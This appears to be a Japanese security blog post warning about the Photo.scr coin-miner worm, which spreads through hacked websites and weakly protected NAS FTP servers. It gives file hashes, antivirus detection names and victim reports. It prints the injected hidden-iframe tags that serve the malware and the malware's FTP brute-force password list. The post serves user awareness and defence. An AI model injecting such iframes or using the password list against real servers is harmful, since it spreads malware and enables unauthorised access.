初回投稿 2016年10月15日

<感染>Photo.scr/info.zipウイルスNAS増殖ftpサーバーが原因?

WindowsのスクリーンセーバーPhoto.scr、info.zip、実行ファイルupdate.exe増殖するウイルス感染被害。運用するNASサーバーに対して脆弱なftpパスワード経由のブルートフォースアタックで不正アクセス攻撃はワーム感染が原因

Chrome / Firefox / Edge ブラウザで普通の一般サイトをネットサーフィンしていたら、次のようなナゾの ファイル をいきなり突然ダウンロードするように促された!?

  • Photo.scr

  • info.zip
    └ 圧縮ファイルの展開で中身 IMG001.scr

  • update.exe

そんな場合、ゼッタイにゼッタイに…

ファイルを開いて起動したらダメ!!!

なお、このファイル形式は Windows の スクリーンセーバー .scr や 実行ファイル .exe です。

言い換えると、Windows 以外の macOS、Android スマホ、iOS (iPhone / iPad)、Linux、ガラケー といった環境では動作しないファイルなので影響ありません。

不正なタグでウイルスの手動ダウンロード?

このファイルをダウンロードする仕掛けが施されていた一般サイトは、明らかに 改ざん被害 を喰らっているパターンでした。

実際に改ざんされていた日本の一般サイトの html ソースコードを確認したら、次のスクリーンショット画像のように 不正なインラインフレームタグ <iframe> がページの最後尾付近にシレッと挿入されているのです。 <うひゃ~

イメージ 2
とある社会福祉法人のホームページ

イメージ 1
とある会社事業所のホームページ

イメージ 5
とある建設会社のホームページ

イメージ 8
とある旅行会社のホームページ
(挿入位置は最上部)

【挿入される不正なコード例 その1】
<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>
【挿入される不正なコード例 その2】
<iframe src =update.exe width=1 height=1 frameborder=0>
</iframe>

ここは、何もいかがわしいエッチぃなコンテンツで溢れる 怪しいサイト ではありません。

怪しいサイトに行かないから、ウチの PC はウイルス感染なんて関係ないしwww』 みたく、現実と乖離した思い込みに染まっていて、セキュリティの意識が希薄な Windows ユーザーさんは注意が必要です。

写真? Photo.scr の見た目でウイルス分析

ファイル名 「Photo.scr」 から 写真(フォト) と錯覚させたいのだろうけど、ファイルの種類 (拡張子) は .scr です。

一般的な写真の形式 JPEG の画像ファイル .jpg ではなく、セキュリティ感覚に問題がない Windows ユーザーさんならば、この怪しいファイルがコンピュータウイルス・マルウェアと気づけるでしょう。 <ファイルサイズも異様にデカいし

- Photo.scr ウイルス実物画像 -

イメージ 3
「フォルダー」 っぽく見えるアイコンの偽装でクリックを誘う

ただし、Windows の 設定でファイルの拡張子を表示しない ままだと、見た目が 『写真が含まれている Photo フォルダー』 にしか見えません。

イメージ 4
完全に 「フォルダー」 にしか見えん

うっかり Photo.scr をダブルクリックして自爆してしまう危険性は 0 とは言えないでしょう。

ウイルスの詳細とセキュリティ関連の記事

セキュリティ製品のウイルス検出名

この不正なファイルは、主要な Windows 向けセキュリティソフトがほぼ100%脅威と判定して検疫するので、コンピュータウイルスやマルウェアと気づくことなく開く可能性は低いはずです。 <セキュリティソフトが機能していないとか論外

【ファイルのハッシュ値 と VirusTotal スキャン結果】
Photo.scr

サイズ 1.50 MB (1,578,496 バイト)
MD5 aba2d86ed17f587eb6d57e6c75f64f05
SHA-1 aeccba64f4dd19033ac2226b4445faac05c88b76

IMG001.scr
MD5 fbbcf1e9501234d6661a0c9ae6dc01c9
SHA-1 1ca9759a324159f331e79ea6871ad62040521b41

update.exe
MD5 340a7feab3a126973b31b5224d0514d3
SHA-1 490514aca3cca72f0a40144295db97b8aa742e45

NsCpuCNMiner32.exe
MD5 3afeb8e9af02a33ff71bf2f6751cae3a
SHA-1 fd358cfe41c7aa3aa9e4cf62f832d8ae6baa8107
【セキュリティソフトのウイルス検出名例】
avast Win32:CryptoMiner-Z [Trj] Script:SNH-gen [Trj]
Avira TR/BitCoinMiner.fra TR/BitCoinMiner.owpxk
BitDefender Trojan.AgentWDCR.HWR Trojan.AgentWDCR.ERF Trojan.GenericKD.34597380
ESET Win32/Crytes.AA Win32/BitCoinMiner.BX NSIS/CoinMiner.K Win32/CoinMiner.CAR
Kaspersky Trojan.Win32.Agentb.btdr Trojan.Win32.Miner.ays Trojan.NSIS.Agent.pf
Malwarebytes PUP.Optional.BitCoinMiner Trojan.BitCoinMiner  RiskWare.BitCoinMiner
McAfee Generic.zn Trojan-CoinMiner
Microsoft Trojan:Win32/CoinMiner.BB!bit Trojan:Win32/CoinMiner!rfn Trojan:Win32/CoinMiner!bit
Sophos Troj/Miner-CZ Mal/Miner-C
Symantec SMG.Heur!gen Trojan.Coinbitminer
Trend Micro WORM_COINMINE.NC WORM_COINMINER.QA WORM_COINMINER.RT

セキュリティ会社の脅威情報によると、ウイルス感染時の症状は次のような感じです。 <CoinMiner

  1. Windows マシンのリソースを勝手に使って仮想通貨ビットコインをマイニングする

  2. 感染マシン内にある .php ファイル、.html ファイルを改ざんする
    → 不正なインラインフレームタグ <iframe> をページの最後尾に挿入

  3. Windows マシンのあらゆるフォルダーに Photo.scr のコピーを投下して増殖する

  4. 脆弱な ftp サーバーにブルートフォース攻撃で不正アクセスする
    → 世界中のサーバーに Photo.scr ウイルスをアップロードする

ワーム的な動作があり、感染被害者は マルウェアの拡散に加担する加害者 にもなります。

実行ファイル単体配布でインストール作業が不要な おすすめウイルス削除ツール(無料) をまずは入手し、Windows パソコンでウイルスが起動しない状態の セーフモードで起動 してウイルススキャンして駆除する方法が無難でしょう。



ftp サーバーのユーザー名やパスワード

この Photo.scr ウイルスのデータ内部には、世界中の脆弱な ftp サーバーにブルートフォース攻撃で不正アクセスする処理があり、実際に攻撃で使われている ユーザー名パスワードの文字列 がコチラ♪

イメージ 7
総当たり攻撃するためのパスワード一覧

【ftp サーバーに不正アクセスするユーザー名&パスワード例】
000000
111111
123
123123
1234
12345
123456
1234567
12345678
123456789
1234567890
123qwe
abc123
admin
Admin
admin123
administrator
anonymous
derok010101
devry
email@email.com
ftp
pass
pass1234
password
qwerty
test
windows
www-data
無題な濃いログ

まさに、複雑なパスワード文字列ではない 「アルファベットや数字の羅列」 「キーボードの配列」 「辞書にのっている英単語」、いわゆる 使ってはいけない危険なパスワード でお馴染みです。 


Photo.scr ウイルス関連ページ

Photo.scr 感染被害者さんのお話、セキュリティ情報サイトの記事です。

NASがBitcoinMinerに感染! - hariwiki@Wiki
NAS内にPhoto.scrが現れたりするのは、私が常時接続のネットワーク上で、NASのFTPサービスを使っていたため、外部からこのFTPサーバであるNASに侵入されたようです。パスワードも掛けていたのですが、レベルの低いものだったのでクラックされたみたいです。
https://w.atwiki.jp/hariwiki/pages/16.html

マルウェア?:Photo.scr - My Journal
本人は海外出張中でした。ファイルは、常時ネットワークにつながっているNAS上に、数万個入っていました。ウィルス対策ソフトで削除しようとしましたが、うまくいきませんでした。
http://young-at-heart.club/my_journal/2019/06/09/

会社のパソコンが最近壊れ新しくしました。OSはXPです。XPでないと動かない機械があるからです。最近、そこに繋がってるテラステーションなどにPhoto.scrというスクリーンセーバーがやたらと作成されており、調べたところウイルス感染とわかりました。
https://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q13190869598

けろさんのツイート: "うちの鯖に時々ssh attackしてくる111 dot 64 dot 207 dot 217、80番開きに行くとWin32/Crytes.AA入りのPhoto.scrのダウンロードが始まるので怖い物みたい人は開いてみて"
https://twitter.com/kero7/status/914917127294918656

星野さんのツイート: "なんか、、、ネットワークドライブ内に作ったフォルダのひとつひとつに「info.zip」なるものが作られてて、なんやこれ?思てファイルのスキャンをやってみたらウイルス的なのが入ってて、何個か調べたら全部に同じのが入ってた。。。"
https://twitter.com/haruka_hoshino/status/691539001895833600

北浜のるてさんのツイート: "外付けHDDを一時期wifiルータ使ってNASみたくしてたんだけど、どうも侵入されてマルウェア(Photo.scr)仕掛けられてたらしくてアレだな"
https://twitter.com/norte_kita/status/1125340401819250688
NAS サーバーを悪用し仮想通貨を採掘するマルウェア 自社の NAS サーバーは大丈夫? - ソフォス
Mal/Miner-C がユーザーのコンピュータを秘密裏に感染させ、ホストサーバーと通信し、バックグラウンドで密かに採掘を実行する方法について説明しています。1 台のコンピューターでは仮想通貨の採掘にそれほど大きな影響はないかもしれませんが、数百台または数千台のコンピューターを感染させ、できる限り多くの通貨を取得するために、サイバー犯罪者はこのマルウェア (ワームのように自己増殖します) によってできる限り多くのコンピューターを感染させようとしています。
https://nakedsecurity.sophos.com/ja/2016/09/08/

The PhotoMiner Campaign - GuardiCore
https://www.guardicore.com/2016/06/the-photominer-campaign/

Analysis of a cryptomining malware or why clicking on folder icons can be dangerous - Internetwache
https://en.internetwache.org/analysis-of-a-cryptomining-malware-or-why-clicking-on-folder-icons-can-be-dangerous-09-09-2016/

Resurrection of the Evil Miner - FireEye
https://www.fireeye.com/blog/threat-research/2016/06/resurrection-of-the-evil-miner.html

Obfuscated Bitcoin Miner Propagates Through FTP Using Password Dictionary - Fortinet
https://www.fortinet.com/blog/threat-research/obfuscated-bitcoin-miner-propagates-through-ftp-using-password-dictionary.html